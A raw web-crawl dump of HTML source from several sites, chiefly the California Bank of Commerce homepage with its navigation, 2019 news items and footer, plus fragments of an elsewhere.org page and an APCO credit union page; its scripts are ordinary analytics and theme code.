html, iframe, img, qt, swf, wmp --> <script type="text/javascript"> /* <![CDATA[ */ var shadowbox_conf = { animate: true, animateFade: true, animSequence: "sync", modal: false, showOverlay: true, overlayColor: "#000", overlayOpacity: "0.8", flashBgColor: "#000000", autoplayMovies: true, showMovieControls: true, slideshowDelay: 0, resizeDuration: "0.35", fadeDuration: "0.35", displayNav: true, continuous: false, displayCounter: true, counterType: "default", counterLimit: "10", viewportPadding: "20", handleOversize: "resize", handleUnsupported: "link", autoDimensions: false, initialHeight: "160", initialWidth: "320", enableKeys: true, skipSetup: false, useSizzle: false, flashParams: {bgcolor:"#000000", allowFullScreen:true}, flashVars: {}, flashVersion: "9.0.0" }; Shadowbox.init(shadowbox_conf); /* ]]> */ </script> <!-- End Shadowbox JS --> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'70314611',post:'0',tz:'-7',srv:'www.elsewhere.org'} ]); _stq.push([ 'clickTrackerInit', '70314611', '0' ]); </script> <script type="text/javascript"> jQuery(document).ready(function () { if (typeof MP3_JPLAYER !== 'undefined') { MP3_JPLAYER.plugin_path = 'http://www.elsewhere.org/journal/wp-content/plugins/mp3-jplayer'; MP3_JPLAYER.pl_info = MP3jPLAYERS; MP3_JPLAYER.vars.dload_text = 'DOWNLOAD MP3'; MP3_JPLAYER.hasListMeta = false; MP3_JPLAYER.vars.stylesheet_url = 'http://www.elsewhere.org/journal/wp-content/plugins/mp3-jplayer/css/v1-skins/v1-silver.css'; MP3_JPLAYER.showErrors = false; MP3_JPLAYER.init(); } }); </script> <style type="text/css"> .innertab { background-color:rgba(167,167,167,0.35); } .playlist-colour { background:rgb(241,241,241); } .interface-mjp { color:#525252; } .loadMI_mp3j, .loadB_mp3j, .load_mp3j { background:rgba(52,162,217,0.7); } .poscolMI_mp3j, .MIsliderVolume .ui-widget-header, .vol_mp3t .ui-widget-header, .vol_mp3j .ui-widget-header { background-color:rgba(92,201,255,0.8); } .mp3-tint, .Smp3-tint { background-color:rgba(92,201,255,0.8); } .player-track-title { font-size:16px; } .a-mjp { font-size:12px; color:#525252; } .a-mjp:hover { color:#768D99 !important; background:transparent !important; } .a-mjp.mp3j_A_current { color:#47ACDE !important; background:transparent !important; } .li-mjp { font-size:12px; } .li-mjp:hover { background-color:transparent; } .li-mjp.mp3j_LI_current { background-color:transparent; } .transport-MI div, .transport-MI div:hover, span.textbutton_mp3j { color:#47ACDE; } </style> </body> </html>
0
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>California Bank of Commerce</title> <!-- All in One SEO Pack 2.12.1 by Michael Torbert of Semper Fi Web Design[-1,-1] --> <link rel='next' href='https://www.californiabankofcommerce.com/page/2/' /> <link rel="canonical" href="https://www.californiabankofcommerce.com/" /> <!-- /all in one seo pack --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.californiabankofcommerce.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='simple-job-board-google-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100i%2C300%2C300i%2C400%2C400i%2C500%2C500i%2C700%2C700i%2C900%2C900i&#038;ver=2.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-font-awesome-css' href='https://www.californiabankofcommerce.com/wp-content/plugins/simple-job-board/public/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-jquery-ui-css' href='https://www.californiabankofcommerce.com/wp-content/plugins/simple-job-board/public/css/jquery-ui.css?ver=1.12.1' type='text/css' media='all' /> <link rel='stylesheet' id='simple-job-board-frontend-css' href='https://www.californiabankofcommerce.com/wp-content/plugins/simple-job-board/public/css/simple-job-board-public.css?ver=3.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='wp-date-remover-css' href='https://www.californiabankofcommerce.com/wp-content/plugins/wp-date-remover/public/css/wp-date-remover-public.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/bootstrap/css/bootstrap.min.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='customstyle-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/css/style.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='header-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/css/header.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='footer-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/css/footer.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='color-theme-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/css/color-theme.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='cbc-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/css/cbc.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='fa-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/font-awesome/css/font-awesome.min.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='skyforms-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/sky-forms-pro/skyforms/css/sky-forms.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='skyforms-custom-style-css' href='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/sky-forms-pro/skyforms/custom/custom-sky-forms.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='Montserrat-css' href='https://fonts.googleapis.com/css?family=Montserrat&#038;ver=1.0.0' type='text/css' media='all' /> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var gadwpUAEventsData = {"options":{"event_tracking":"1","event_downloads":"zip|mp3*|mpe*g|pdf|docx*|pptx*|xlsx*|rar*","event_bouncerate":0,"aff_tracking":1,"event_affiliates":"\/out\/","hash_tracking":"1","root_domain":"californiabankofcommerce.com","event_timeout":100,"event_precision":0,"event_formsubmit":1,"ga_pagescrolldepth_tracking":1,"ga_with_gtag":0}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/plugins/google-analytics-dashboard-for-wp/front/js/tracking-analytics-events.js?ver=5.3.8'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/plugins/google-analytics-dashboard-for-wp/front/js/tracking-scrolldepth.js?ver=5.3.8'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/plugins/wp-date-remover/public/js/wp-date-remover-public.js?ver=1.0.0'></script> <link rel='https://api.w.org/' href='https://www.californiabankofcommerce.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.californiabankofcommerce.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.californiabankofcommerce.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <!-- BEGIN ExactMetrics v5.3.8 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-8791783-1', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <style type="text/css" id="wp-custom-css"> .archive .page-title { display: none; } .post-meta .post-category { display: none; } .page-title .meta-single li { display: none; border-bottom: none; } </style> </head> <body class="header-fixed"> <div style="display: none; visibility: hidden"><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/CBC-logo.png" alt=""/><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/banner.jpg" alt=""/><img src="img/4plex-smaller.jpg" alt=""/> </div> <div class="wrapper"> <div id="skiptocontent"><a href="#maincontent">skip to main content</a> </div> <!--=== Header ===--> <header class="header"> <div class="container"> <span class="logo"> <a href="https://www.californiabankofcommerce.com"> <img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/CBC-logo.png" alt="California Bank of Commerce Logo"> </a></span> <!-- Topbar --> <div class="topbar"> <ul class="loginbar pull-right"> <li class="hoverSelector"> <a class="cbc-btn-login2"href="https://secure.californiabankofcommerce.com/CaliforniaBankofCommerceOnline_41/Authentication/Login.aspx"><i class="fa fa-sign-in white" aria-hidden="true"></i> Client Login</a> <ul class="languages hoverSelectorBlock"> <li> <a href="https://secure.californiabankofcommerce.com/CaliforniaBankofCommerceOnline_41/Authentication/Login.aspx " target="_blank">CBC Online Banking</a> </li> <li><a href="https://www.cbcbusinesscredit.com/" target="_blank">CBC Business Credit</a></li> </ul> </li> </ul> </div> <!-- End Topbar --> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"> <span class="sr-only">Toggle navigation</span> <span class="fa fa-bars"></span></button> </div> <!--/end container--> <nav class="collapse navbar-collapse mega-menu navbar-responsive-collapse"> <div class="container"> <ul class="nav navbar-nav"> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-263" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-263"><a title="HOME" href="/">HOME</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-264" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-264 dropdown"><a title="COMMERCIAL LENDING" href="#" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">COMMERCIAL LENDING <span class=""></span></a> <ul role="menu" class=" dropdown-menu" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-267" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-267"><a title="Lending Products" href="https://www.californiabankofcommerce.com/lending-products/">Lending Products</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-266" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-266"><a title="Dental and Medical Banking" href="https://www.californiabankofcommerce.com/dental-and-medical-banking/">Dental and Medical Banking</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-265" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-265"><a title="CBC Business Credit" href="https://www.californiabankofcommerce.com/cbc-business-credit/">CBC Business Credit</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-515" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-515"><a title="CBC Emerging Business" href="https://www.californiabankofcommerce.com/cbc-emerging-business/">CBC Emerging Business</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-653"><a title="CBC Professional Banking" href="https://www.californiabankofcommerce.com/cbc-professional-banking/">CBC Professional Banking</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-268" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-268 dropdown"><a title="CASH MANAGEMENT" href="#" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">CASH MANAGEMENT <span class=""></span></a> <ul role="menu" class=" dropdown-menu" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-271" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-271"><a title="Deposit and Disbursement Accounts" href="https://www.californiabankofcommerce.com/deposit-and-disbursement-accounts/">Deposit and Disbursement Accounts</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-270" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-270"><a title="Treasury Management" href="https://www.californiabankofcommerce.com/treasury-management/">Treasury Management</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-269" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-269"><a title="Online Banking" href="https://www.californiabankofcommerce.com/online-banking-2/">Online Banking</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-985" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-985"><a title="Client Remote Assistance" href="https://www.californiabankofcommerce.com/client-remote-assistance/">Client Remote Assistance</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-272" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-272 dropdown"><a title="ABOUT" href="#" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">ABOUT <span class=""></span></a> <ul role="menu" class=" dropdown-menu" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-963" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-963"><a title="Bank Overview" href="https://www.californiabankofcommerce.com/about-cbc-2/">Bank Overview</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-281" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-281"><a title="Corporate Governance" href="https://www.californiabankofcommerce.com/about-cbc-2#heading2">Corporate Governance</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-282" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-282"><a title="Organizers" href="https://www.californiabankofcommerce.com/about-cbc-2#heading3">Organizers</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-283" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-283"><a title="Executive Officers" href="https://www.californiabankofcommerce.com/about-cbc-2#heading4">Executive Officers</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-284" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-284"><a title="Directors" href="https://www.californiabankofcommerce.com/about-cbc-2#heading5">Directors</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-285" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-285"><a title="Careers" href="https://www.californiabankofcommerce.com/cbc-careers/">Careers</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-286" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-286"><a title="Investor Relations" href="https://www.snl.com/IRW/CorporateProfile/6542931">Investor Relations</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-450" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-450"><a title="News" href="https://www.californiabankofcommerce.com/news/">News</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-329"><a title="CONTACT" href="https://www.californiabankofcommerce.com/contact-us/">CONTACT</a></li> <!-- Search Block --> <li> <i aria-hidden="true" class="search fa fa-search search-btn"></i> <div class="search-open"> <form id="cbcsearchform" role="search" method="get" action="https://www.californiabankofcommerce.com/" > <div class="input-group animated fadeInDown"> <label for="cbc-site-search" class="hidden">Site Search</label> <input type="search" id="cbc-site-search" class="form-control" placeholder="Search" value="" name="s" title="Search" > <span class="input-group-btn"> <button class="btn-u" type="submit" aria-label="Search">Go</button> </span> </div> </form> </div> </li> <!-- End Search Block --></ul> </div> <!--/end container--> </nav> <!--/navbar-collapse--> </header> <!--=== End Header ===--> <section id="maincontent"> <!-- Banner Section --> <div class="container-fluid cbc-banner-container"> <div class="cbc-banner-wrap" style="background: #243846 url(https://www.californiabankofcommerce.com/wp-content/uploads/bluebird-Oakland_SanFrancisco_SkylinePano_via_Temple_2500x630_rev0cROP.jpg) no-repeat center bottom;"> <!--<img src="img/banner.jpg" class="img-responsive" alt=""/>--> <div class="cbc-banner-con"> <div class="container cbc-banner-con2"> <div> <h1>A Bank Designed For Business</h1> <p class="cbc-font1">California Bank of Commerce was designed and created to provide the best commercial banking services to companies throughout the greater San Francisco Bay area. As experts in business banking we provide actionable, straight-forward, and insightful solutions for your business. </p> </div> </div> </div> </div> </div> <!--END cbc-banner-container--> <!--Clients--> <div class="container content-sm margin-bottom-10"> <div class="headline margin-bottom-20"> <h2 class="cbc-font1" style="margin-bottom: 20px">The Company We Keep</h2> <p>California Bank of Commerce is truly <b><em>defined by the company we keep</em></b>.<span class="cbc-sm" aria-hidden="true">℠</span> That’s why our advertisements feature our clients—whether on the radio or in publications. California Bank of Commerce is committed to putting each client's best interests first.</p> </div> <div class="row cbc-clients"> <ul class="list-inline"> <li><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/clients/logo_syserco_cmyk.png" alt="" /></li> <li><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/clients/RCF_Logo_rgb.jpg" alt="" class="cbc-cl-tall"/></li> <li><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/clients/American-Asphalt-Logo.png" alt="" /></li> <li><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/clients/wr.png" alt="" /></li> <li><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/clients/Rina_Logo_CMYK-300x146.png" alt="" /></li> <li><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/clients/legacyRIS-logo-FINAL.png" alt="" /></li> </ul> </div> </div> <!--END Clients--> <div class="container-fluid text-center"> <img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/4plex-smaller.jpg" class="img-responsive cbc-4plex" alt=""/> </div> <div class="container margin-bottom-50 margin-top-50"> <!-- Services Section --> <section id="services"> <div class="row cbc-equal-height index-posts"> <div class="col-sm-6 cbc-about-1 no-style"> <header> <h3 class="cbc-font1"><!--<i class="fa fa-caret-right fa-2x cbc-green" aria-hidden="true"></i>--> <img class="cbc-icon" src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/arrow-right.png" alt=""> Latest News</h3> </header> <div class="cbc-about-content"> <ul class="list-unstyled cbc-front-list"> <li><strong>California Bank of Commerce Names Thomas A. Sa Incoming CFO and COO</strong><br> May 6, 2019 <a href="https://www.californiabankofcommerce.com/california-bank-of-commerce-names-thomas-a-sa-incoming-cfo-and-coo/">Read more <i class="fa fa-external-link" aria-hidden="true"></i></a> </li> <li><strong>California BanCorp Reports Strong Loan Growth and Earnings of $1.9 Million in the First Quarter of 2019</strong><br> April 30, 2019 <a href="https://www.californiabankofcommerce.com/california-bancorp-reports-strong-loan-growth-and-earnings-of-1-9-million-in-the-first-quarter-of-2019/">Read more <i class="fa fa-external-link" aria-hidden="true"></i></a> </li> <li><strong>California Bank of Commerce Moves Into Sacramento</strong><br> April 10, 2019 <a href="https://www.californiabankofcommerce.com/california-bank-of-commerce-moves-into-sacramento/">Read more <i class="fa fa-external-link" aria-hidden="true"></i></a> </li> </ul> </div> </div> <div class="col-sm-6 cbc-about-2 no-style"> <header> <h3 class="cbc-font1"><img class="cbc-icon" src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/arrow-right.png" alt=""> CBC Headlines</h3> </header> <div class="cbc-about-content"> <ul class="list-unstyled cbc-front-list"> <li><strong>2019 Annual Meeting and Audited Financials</strong><br> <a href="https://www.californiabankofcommerce.com/annual-meeting-and-audited-financials/">Read more <i class="fa fa-external-link" aria-hidden="true"></i></a> </li> <li><strong>Bank Lobby Hours and Holidays</strong><br> <a href="https://www.californiabankofcommerce.com/holiday-hours/">Read more <i class="fa fa-external-link" aria-hidden="true"></i></a> </li> <li><strong>FDIC Deposit Insurance &#8211; Important details</strong><br> <a href="https://www.californiabankofcommerce.com/fdic-deposit-insurance/">Read more <i class="fa fa-external-link" aria-hidden="true"></i></a> </li> </ul> </div> </div> </div> </section> <!-- End Services Section --> </div> </section> <!--=== Footer Version 1 ===--> <footer class="footer-v1"> <div class="footer"> <div class="container"> <div class="row"> <div class="col-md-3 md-margin-bottom-40"> <div class="posts"> <div class="headline"> <h2>Commercial Lending</h2> </div> <ul class="list-unstyled latest-list"> <li id="menu-item-309" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-309"><a href="https://www.californiabankofcommerce.com/lending-products/">Lending Products</a></li> <li id="menu-item-308" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-308"><a href="https://www.californiabankofcommerce.com/dental-and-medical-banking/">Dental and Medical Banking</a></li> <li id="menu-item-307" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-307"><a href="https://www.californiabankofcommerce.com/cbc-business-credit/">CBC Business Credit</a></li> <li id="menu-item-624" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-624"><a href="https://www.californiabankofcommerce.com/cbc-emerging-business/">CBC Emerging Business</a></li> <li id="menu-item-688" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-688"><a href="https://www.californiabankofcommerce.com/cbc-professional-banking/">CBC Professional Banking</a></li> </ul> </div> </div> <div class="col-md-3 md-margin-bottom-40"> <div class="posts"> <div class="headline"> <h2>Cash Management</h2> </div> <ul class="list-unstyled latest-list"> <li id="menu-item-312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-312"><a href="https://www.californiabankofcommerce.com/deposit-and-disbursement-accounts/">Deposit and Disbursement Accounts</a></li> <li id="menu-item-311" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-311"><a href="https://www.californiabankofcommerce.com/treasury-management/">Treasury Management</a></li> <li id="menu-item-310" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-310"><a href="https://www.californiabankofcommerce.com/online-banking-2/">Online Banking</a></li> <li id="menu-item-641" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-641"><a href="https://www.californiabankofcommerce.com/client-remote-assistance/">Client Remote Assistance</a></li> </ul> </div> </div> <div class="col-md-3 md-margin-bottom-40"> <div class="posts"> <div class="headline"> <h2>About Us</h2> </div> <ul class="list-unstyled latest-list"> <li id="menu-item-1060" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1060"><a href="https://www.californiabankofcommerce.com/about-cbc-2/">Bank Overview</a></li> <li id="menu-item-314" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-314"><a href="https://www.californiabankofcommerce.com/about-cbc-2#heading2">Corporate Governance</a></li> <li id="menu-item-315" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-315"><a href="https://www.snl.com/IRW/CorporateProfile/6542931">Investor Relations</a></li> <li id="menu-item-316" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-316"><a href="https://www.californiabankofcommerce.com/cbc-careers/">Careers</a></li> </ul> </div> </div> <!-- Address --> <div class="col-md-3 md-margin-bottom-40"> <div class="headline"><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/CBC-logo-white.png" id="cbc-logo-foot" alt="California Bank of Commerce"/> </div> <address class="md-margin-bottom-40"> <strong>Headquarters</strong><br> 3595 Mt. Diablo Blvd. Suite 220 <br> Lafayette, CA 94549<br> (925) 283-2265 <br> <a href="https://www.californiabankofcommerce.com/contact-us/">Contact Us</a> </address> <h4 style="color: #ffffff">Connect With Us</h4> <p><a href="https://www.linkedin.com/company/california-bank-of-commerce/" class="tooltips" data-toggle="tooltip" data-placement="top" title="" data-original-title="LinkedIn" aria-label="Visit our Linkedin profile" style="color: #fff" target="_blank"> <i aria-hidden="true" class="fa fa-linkedin cbc-linkedin"></i> </a> </p> </div> <!--/col-md-3--> <!-- End Address --> </div> </div> </div> <!--/footer--> <div class="copyright"> <div class="container"> <div class="row"> <div class="col-md-10"> <p>&copy; 2018 California Bank of Commerce &#8212; <a href="https://www.californiabankofcommerce.com/privacy-policy/">Privacy Policy</a> | <a href="https://www.californiabankofcommerce.com/security-fraud-prevention/">Security / Fraud Prevention</a> </p> </div> <!-- Social Links --> <div class="col-md-2"> <a href="https://www.fdic.gov/deposit/" target="_blank"><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/FDIC_Logo-e1526309605999.png" alt="FDIC" class="cbc-fdic"/></a><a href="https://www.fdic.gov/regulations/laws/rules/2000-6000.html" target="_blank"><img src="https://www.californiabankofcommerce.com/wp-content/themes/CBC/img/ehl-white.png" alt="Equal Housing Lender" class="cbc-ehl"/></a> </div> <!-- End Social Links --> </div> </div> </div> <!--/copyright--> </footer> <!--=== End Footer Version 1 ===--> </div> <script type="text/javascript"> jQuery("#post-587 .entry-meta .date").css("display","none"); jQuery("#post-587 .entry-date").css("display","none"); jQuery("#post-587 .posted-on").css("display","none"); jQuery("#post-293 .entry-meta .date").css("display","none"); jQuery("#post-293 .entry-date").css("display","none"); jQuery("#post-293 .posted-on").css("display","none"); jQuery("#post-291 .entry-meta .date").css("display","none"); jQuery("#post-291 .entry-date").css("display","none"); jQuery("#post-291 .posted-on").css("display","none"); </script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/bootstrap/js/bootstrap.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/back-to-top.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/plugins/smoothScroll.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/js/custom.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-content/themes/CBC/assets/js/app.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.californiabankofcommerce.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> </body> </html>
0
<!DOCTYPE HTML> <!--BEGIN HTML --> <html lang="en-US"> <!--BEGIN head --> <head> <!--Meta Tags --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <!-- Set the viewport width to device width for mobile --> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <!-- Title --> <title> APCO Employees Credit Union</title> <!-- Stylesheets --> <link rel="stylesheet" href="https://www.apcocu.org/wp-content/themes/davrack/style.css?ver=1.1" type="text/css" media="screen" /> <link rel="stylesheet" href="https://www.apcocu.org/wp-content/themes/davrack/custom.css" type="text/css" media="screen" /> <link rel="stylesheet" href="https://www.apcocu.org/wp-content/themes/davrack/inc/styles/light_blue.css" type="text/css" media="screen" /> <link rel="stylesheet" href="https://www.apcocu.org/?my_theme_custom_var=css" type="text/css" media="screen" /> <!--<link rel="stylesheet" href="https://www.apcocu.org/wp-content/themes/davrack/inc/css/prettyPhoto.css" type="text/css" media="screen" />--> <!--[if IE]><link rel="stylesheet" type="text/css" media="all" href="https://www.apcocu.org/wp-content/themes/davrack/style-ie.css" /><![endif]--> <!--[if lt IE 9]><script type="text/javascript" src="https://www.apcocu.org/wp-content/themes/davrack/js/html5.js"></script><![endif]--> <link 